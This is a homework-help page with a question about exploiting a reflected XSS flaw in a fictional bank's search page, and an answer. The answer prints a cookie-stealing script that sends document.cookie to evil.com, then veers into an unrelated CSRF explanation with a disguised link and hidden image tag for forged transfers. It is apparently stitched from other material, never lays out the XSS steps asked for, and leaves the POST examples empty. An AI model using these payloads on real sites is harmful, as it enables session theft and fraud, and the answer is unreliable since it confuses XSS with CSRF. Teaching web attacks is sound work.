Academic Integrity: tutoring, explanations, and feedback — we don’t complete graded work or submit on a student’s behalf.

XSS Attacks: Alice does Internet banking at XYZBank (http://www.xyzbank.com) and

ID: 3582079 • Letter: X

Question

XSS Attacks:

Alice does Internet banking at XYZBank (http://www.xyzbank.com) and has a username and password there. XYZBank uses standard cookies for sessions. Unfortunately, there is a search box on the XYZBank website that yields an XSS vulnerability. Specifically, when a user enters a search term such as location, she is taken to http://www.xyzbank.com/search.php?query=location and the search.php file contains the code: <?php echo $_GET['query'] ?> In other words, the search query is immediately echoed to the screen without any ltering. Alice's evil friend Bob wants to get access to her Online banking account.

Explain how Bob might exploit this XSS vulnerability to do so. You should describe each step involved.

Explanation / Answer

Cross-site Scripting (XSS) Attack:

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

An XSS attack needs three actors — the website, the victim and the attacker.

Here the website is-XYZ bank website, the victim-Alice and the attacker is-Bob

Now Bob’s(attacker) goal is to impersonate the Alice (victim) by stealing the Alice cookie. Sending the cookie to a server the bob’s controls can be achieved in a variety of ways, one of which is for the bob to execute the following JavaScript code in the Alice’s browser through an XSS vulnerability.

<script>

   window.location=“http://evil.com/?cookie=” + document.cookie

</script>

Steps Involved in this attack are:

How does the attack work?

There are numerous ways in which an end user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a valid malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Maria using the xyz bank web application that is vulnerable to CSRF. Bob, an attacker, wants to trick Alice into sending the money to her instead. The attack will comprise the following steps:

GET scenario

If the application was designed to primarily use GET requests to transfer parameters and execute actions, the money transfer operation might be reduced to a request like:

GET http://bank.com/transfer.do?acct=MARIA&amount=100 HTTP/1.1

Bob now decides to exploit this web application vulnerability using Alice as her victim. Bob first constructs the following exploit URL which will transfer $100,000 from Alice's account to her account. She takes the original command URL and replaces the beneficiary name with herself, raising the transfer amount significantly at the same time:

http://bank.com/transfer.do?acct=BOB&amount=100000

The social engineering aspect of the attack tricks Alice into loading this URL when she's logged into the bank application. This is usually done with one of the following techniques:

The exploit URL can be disguised as an ordinary link, encouraging the victim to click it:

<a href="http://bank.com/transfer.do?acct=BOB&amp;amount=100000">View my Pictures!</a>

Or as a 0x0 fake image:

<img src="http://bank.com/transfer.do?acct=BOB&amp;amount=100000" width="0" height="0" border="0">

If this image tag were included in the email, Alice wouldn't see anything. However, the browser will still submit the request to XYZ bank website without any visual indication that the transfer has taken place.

POST scenario

The only difference between GET and POST attacks is how the attack is being executed by the victim. Let's assume the bank now uses POST and the vulnerable request looks like this:

Such a request cannot be delivered using standard A or IMG tags, but can be delivered using a FORM tag:

This form will require the user to click on the submit button, but this can be also executed automatically using JavaScript:

Related Questions

XFINITY Mobile 11:33 AM sths.schoolloop.com a. rhombus C. square For any rhombus
Question #3198868
XG Do not include states of x Smartworks Smartworks for Chemis. × orton.com/4242
Question #1037272
XGAn electrolyte is a substano urse Home post-lecture Post Lecture Homework Chap
Question #1036558
XGmargin of safety formus+ hittps Help Save & E hapters 19 to 22 Homework Projec
Question #2398512
XGmargin of safety formus+ hittps Help Save & E hapters 19 to 22 Homework Projec
Question #2398709
XHome-wichita.edu xTake Test: Quiz 6-Internation x+ https:/blackboard.wichita.ed
Question #391456
XI GONG&1 9/7/18 4:03 PM Homework: Chapter 2 Homework Save Score: 3 of 6 pts 4 1
Question #3068523
XI GONG&9/7/18 4:15 PM s Homework: Chapter 2 Homework Save Score: 0 of 3 pts 9 o
Question #3068525

Navigate

Previous
XSL Transforms : - Get a listing of vSwitch (provided in sample) - Get a listing
Next
XSS Attacks: a. If a site is configured to use HTTPOnly cookies, then Javascript

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.